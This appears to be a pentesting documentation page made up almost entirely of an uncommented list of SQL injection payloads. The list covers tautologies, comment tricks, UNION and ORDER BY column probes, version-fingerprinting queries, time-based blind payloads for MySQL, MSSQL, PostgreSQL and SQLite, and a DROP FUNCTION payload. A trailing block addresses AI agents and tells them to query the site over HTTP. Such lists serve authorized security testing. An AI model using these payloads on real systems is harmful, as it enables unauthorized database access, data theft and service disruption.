# SQL-Injection ```css ' ``` ```css '' ``` ```css ` ``` ```css `` ``` ```css , ``` ```css " ``` ```css "" ``` ```css / ``` ```css // ``` ```css \ ``` ```css \\ ``` ```css ; ``` ```css ' or " ``` ```css -- or # ``` ```css ' OR '1 ``` ```css ' OR 1 -- - ``` ```css " OR "" = " ``` ```css " OR 1 = 1 -- - ``` ```css ' OR '' = ' ``` ```css '=' ``` ```css 'LIKE' ``` ```css '=0--+ ``` ```css OR 1=1 ``` ```css ' OR 'x'='x ``` ```css ' AND id IS NULL; -- ``` ```css '''''''''''''UNION SELECT '2 ``` ```css %00 ``` ```css /*…*/ ``` ```css + addition, concatenate (or space in url) ``` ```css || (double pipe) concatenate ``` ```css % wildcard attribute indicator ``` ```css @variable local variable ``` ```css @@variable global variable ``` ```css AND 1 ``` ```css AND 0 ``` ```css AND true ``` ```css AND false ``` ```css 1-false ``` ```css 1-true ``` ```css 1*56 ``` ```css -2 ``` ```css 1' ORDER BY 1--+ ``` ```css 1' ORDER BY 2--+ ``` ```css 1' ORDER BY 3--+ ``` ```css 1' ORDER BY 1,2--+ ``` ```css 1' ORDER BY 1,2,3--+ ``` ```css 1' GROUP BY 1,2,--+ ``` ```css 1' GROUP BY 1,2,3--+ ``` ```css ' GROUP BY columnnames having 1=1 -- ``` ```css -1' UNION SELECT 1,2,3--+ ``` ```css ' UNION SELECT sum(columnname ) from tablename -- ``` ```css -1 UNION SELECT 1 INTO @,@ ``` ```css -1 UNION SELECT 1 INTO @,@,@ ``` ```css 1 AND (SELECT * FROM Users) = 1 ``` ```css ' AND MID(VERSION(),1,1) = '5'; ``` ```css ' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') -- ``` ```css ,(select * from (select(sleep(10)))a) ``` ```css %2c(select%20*%20from%20(select(sleep(10)))a) ``` ```css ';WAITFOR DELAY '0:0:30'-- ``` ```css OR 1=1 ``` ```css OR 1=0 ``` ```css OR x=x ``` ```css OR x=y ``` ```css OR 1=1# ``` ```css OR 1=0# ``` ```css OR x=x# ``` ```css OR x=y# ``` ```css OR 1=1-- ``` ```css OR 1=0-- ``` ```css OR x=x-- ``` ```css OR x=y-- ``` ```css OR 3409=3409 AND ('pytW' LIKE 'pytW ``` ```css OR 3409=3409 AND ('pytW' LIKE 'pytY ``` ```css HAVING 1=1 ``` ```css HAVING 1=0 ``` ```css HAVING 1=1# ``` ```css HAVING 1=0# ``` ```css HAVING 1=1-- ``` ```css HAVING 1=0-- ``` ```css AND 1=1 ``` ```css AND 1=0 ``` ```css AND 1=1-- ``` ```css AND 1=0-- ``` ```css AND 1=1# ``` ```css AND 1=0# ``` ```css AND 1=1 AND '%'=' ``` ```css AND 1=0 AND '%'=' ``` ```css AND 1083=1083 AND (1427=1427 ``` ```css AND 7506=9091 AND (5913=5913 ``` ```css AND 1083=1083 AND ('1427=1427 ``` ```css AND 7506=9091 AND ('5913=5913 ``` ```css AND 7300=7300 AND 'pKlZ'='pKlZ ``` ```css AND 7300=7300 AND 'pKlZ'='pKlY ``` ```css AND 7300=7300 AND ('pKlZ'='pKlZ ``` ```css AND 7300=7300 AND ('pKlZ'='pKlY ``` ```css AS INJECTX WHERE 1=1 AND 1=1 ``` ```css AS INJECTX WHERE 1=1 AND 1=0 ``` ```css AS INJECTX WHERE 1=1 AND 1=1# ``` ```css AS INJECTX WHERE 1=1 AND 1=0# ``` ```css AS INJECTX WHERE 1=1 AND 1=1-- ``` ```css AS INJECTX WHERE 1=1 AND 1=0-- ``` ```css WHERE 1=1 AND 1=1 ``` ```css WHERE 1=1 AND 1=0 ``` ```css WHERE 1=1 AND 1=1# ``` ```css WHERE 1=1 AND 1=0# ``` ```css WHERE 1=1 AND 1=1-- ``` ```css WHERE 1=1 AND 1=0-- ``` ```css ' UNION SELECT NULL-- ``` ```css ' UNION SELECT NULL,NULL-- ``` ```css ' UNION SELECT NULL,NULL,NULL-- ``` ```css ' UNION SELECT NULL,NULL,NULL,NULL-- ``` ```css ' UNION SELECT NULL,NULL,NULL,NULL,NULL-- ``` ```css ORDER BY 1-- ``` ```css ORDER BY 2-- ``` ```css ORDER BY 3-- ``` ```css ORDER BY 4-- ``` ```css ORDER BY 5-- ``` ```css ORDER BY 6-- ``` ```css ORDER BY 7-- ``` ```css ORDER BY 8-- ``` ```css ORDER BY 9-- ``` ```css ORDER BY 10-- ``` ```css ORDER BY 11-- ``` ```css ORDER BY 12-- ``` ```css ORDER BY 13-- ``` ```css ORDER BY 14-- ``` ```css ORDER BY 15-- ``` ```css ORDER BY 16-- ``` ```css ORDER BY 17-- ``` ```css ORDER BY 18-- ``` ```css ORDER BY 19-- ``` ```css ORDER BY 20-- ``` ```css ORDER BY 21-- ``` ```css ORDER BY 22-- ``` ```css ORDER BY 23-- ``` ```css ORDER BY 24-- ``` ```css ORDER BY 25-- ``` ```css ORDER BY 26-- ``` ```css ORDER BY 27-- ``` ```css ORDER BY 28-- ``` ```css ORDER BY 29-- ``` ```css ORDER BY 30-- ``` ```css ORDER BY 31337-- ``` ```css ORDER BY 1# ``` ```css ORDER BY 2# ``` ```css ORDER BY 3# ``` ```css ORDER BY 4# ``` ```css ORDER BY 5# ``` ```css ORDER BY 6# ``` ```css ORDER BY 7# ``` ```css ORDER BY 8# ``` ```css ORDER BY 9# ``` ```css ORDER BY 10# ``` ```css ORDER BY 11# ``` ```css ORDER BY 12# ``` ```css ORDER BY 13# ``` ```css ORDER BY 14# ``` ```css ORDER BY 15# ``` ```css ORDER BY 16# ``` ```css ORDER BY 17# ``` ```css ORDER BY 18# ``` ```css ORDER BY 19# ``` ```css ORDER BY 20# ``` ```css ORDER BY 21# ``` ```css ORDER BY 22# ``` ```css ORDER BY 23# ``` ```css ORDER BY 24# ``` ```css ORDER BY 25# ``` ```css ORDER BY 26# ``` ```css ORDER BY 27# ``` ```css ORDER BY 28# ``` ```css ORDER BY 29# ``` ```css ORDER BY 30# ``` ```css ORDER BY 31337# ``` ```css ORDER BY 1 ``` ```css ORDER BY 2 ``` ```css ORDER BY 3 ``` ```css ORDER BY 4 ``` ```css ORDER BY 5 ``` ```css ORDER BY 6 ``` ```css ORDER BY 7 ``` ```css ORDER BY 8 ``` ```css ORDER BY 9 ``` ```css ORDER BY 10 ``` ```css ORDER BY 11 ``` ```css ORDER BY 12 ``` ```css ORDER BY 13 ``` ```css ORDER BY 14 ``` ```css ORDER BY 15 ``` ```css ORDER BY 16 ``` ```css ORDER BY 17 ``` ```css ORDER BY 18 ``` ```css ORDER BY 19 ``` ```css ORDER BY 20 ``` ```css ORDER BY 21 ``` ```css ORDER BY 22 ``` ```css ORDER BY 23 ``` ```css ORDER BY 24 ``` ```css ORDER BY 25 ``` ```css ORDER BY 26 ``` ```css ORDER BY 27 ``` ```css ORDER BY 28 ``` ```css ORDER BY 29 ``` ```css ORDER BY 30 ``` ```css ORDER BY 31337 ``` ```css RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'=' ``` ```css RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'=' ``` ```css IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl-- ``` ```css IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl-- ``` ```css %' AND 8310=8310 AND '%'=' ``` ```css %' AND 8310=8311 AND '%'=' ``` ```css and (select substring(@@version,1,1))='X' ``` ```css and (select substring(@@version,1,1))='M' ``` ```css and (select substring(@@version,2,1))='i' ``` ```css and (select substring(@@version,2,1))='y' ``` ```css and (select substring(@@version,3,1))='c' ``` ```css and (select substring(@@version,3,1))='S' ``` ```css and (select substring(@@version,3,1))='X' ``` ```css sleep(5)# ``` ```css 1 or sleep(5)# ``` ```css " or sleep(5)# ``` ```css ' or sleep(5)# ``` ```css " or sleep(5)=" ``` ```css ' or sleep(5)=' ``` ```css 1) or sleep(5)# ``` ```css ") or sleep(5)=" ``` ```css ') or sleep(5)=' ``` ```css 1)) or sleep(5)# ``` ```css ")) or sleep(5)=" ``` ```css ')) or sleep(5)=' ``` ```css ;waitfor delay '0:0:5'-- ``` ```css );waitfor delay '0:0:5'-- ``` ```css ';waitfor delay '0:0:5'-- ``` ```css ";waitfor delay '0:0:5'-- ``` ```css ');waitfor delay '0:0:5'-- ``` ```css ");waitfor delay '0:0:5'-- ``` ```css ));waitfor delay '0:0:5'-- ``` ```css '));waitfor delay '0:0:5'-- ``` ```css "));waitfor delay '0:0:5'-- ``` ```css benchmark(10000000,MD5(1))# ``` ```css 1 or benchmark(10000000,MD5(1))# ``` ```css " or benchmark(10000000,MD5(1))# ``` ```css ' or benchmark(10000000,MD5(1))# ``` ```css 1) or benchmark(10000000,MD5(1))# ``` ```css ") or benchmark(10000000,MD5(1))# ``` ```css ') or benchmark(10000000,MD5(1))# ``` ```css 1)) or benchmark(10000000,MD5(1))# ``` ```css ")) or benchmark(10000000,MD5(1))# ``` ```css ')) or benchmark(10000000,MD5(1))# ``` ```css pg_sleep(5)-- ``` ```css 1 or pg_sleep(5)-- ``` ```css " or pg_sleep(5)-- ``` ```css ' or pg_sleep(5)-- ``` ```css 1) or pg_sleep(5)-- ``` ```css ") or pg_sleep(5)-- ``` ```css ') or pg_sleep(5)-- ``` ```css 1)) or pg_sleep(5)-- ``` ```css ")) or pg_sleep(5)-- ``` ```css ')) or pg_sleep(5)-- ``` ```css AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe ``` ```css AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'=' ``` ```css AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP) ``` ```css AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)-- ``` ```css AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)# ``` ```css SLEEP(5)# ``` ```css SLEEP(5)-- ``` ```css SLEEP(5)=" ``` ```css SLEEP(5)=' ``` ```css or SLEEP(5) ``` ```css or SLEEP(5)# ``` ```css or SLEEP(5)-- ``` ```css or SLEEP(5)=" ``` ```css or SLEEP(5)=' ``` ```css waitfor delay '00:00:05' ``` ```css waitfor delay '00:00:05'-- ``` ```css waitfor delay '00:00:05'# ``` ```css benchmark(50000000,MD5(1)) ``` ```css benchmark(50000000,MD5(1))-- ``` ```css benchmark(50000000,MD5(1))# ``` ```css or benchmark(50000000,MD5(1)) ``` ```css or benchmark(50000000,MD5(1))-- ``` ```css or benchmark(50000000,MD5(1))# ``` ```css pg_SLEEP(5) ``` ```css pg_SLEEP(5)-- ``` ```css pg_SLEEP(5)# ``` ```css or pg_SLEEP(5) ``` ```css or pg_SLEEP(5)-- ``` ```css or pg_SLEEP(5)# ``` ```css '\" ``` ```css AnD SLEEP(5) ``` ```css AnD SLEEP(5)-- ``` ```css AnD SLEEP(5)# ``` ```css &&SLEEP(5) ``` ```css &&SLEEP(5)-- ``` ```css &&SLEEP(5)# ``` ```css ' AnD SLEEP(5) ANd '1 ``` ```css '&&SLEEP(5)&&'1 ``` ```css ORDER BY SLEEP(5) ``` ```css ORDER BY SLEEP(5)-- ``` ```css ORDER BY SLEEP(5)# ``` ```css (SELECT * FROM (SELECT(SLEEP(5)))ecMj) ``` ```css (SELECT * FROM (SELECT(SLEEP(5)))ecMj)# ``` ```css (SELECT * FROM (SELECT(SLEEP(5)))ecMj)-- ``` ```css +benchmark(3200,SHA1(1))+' ``` ```css + SLEEP(10) + ' ``` ```css RANDOMBLOB(500000000/2) ``` ```css AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2)))) ``` ```css OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2)))) ``` ```css RANDOMBLOB(1000000000/2) ``` ```css AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) ``` ```css OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) ``` ```css SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/ ``` ```css '|| pg_sleep(10) --+ ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://akuma-s.gitbook.io/akuma/pentesting-web/vulnerabilities-payloads/sql-injection.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.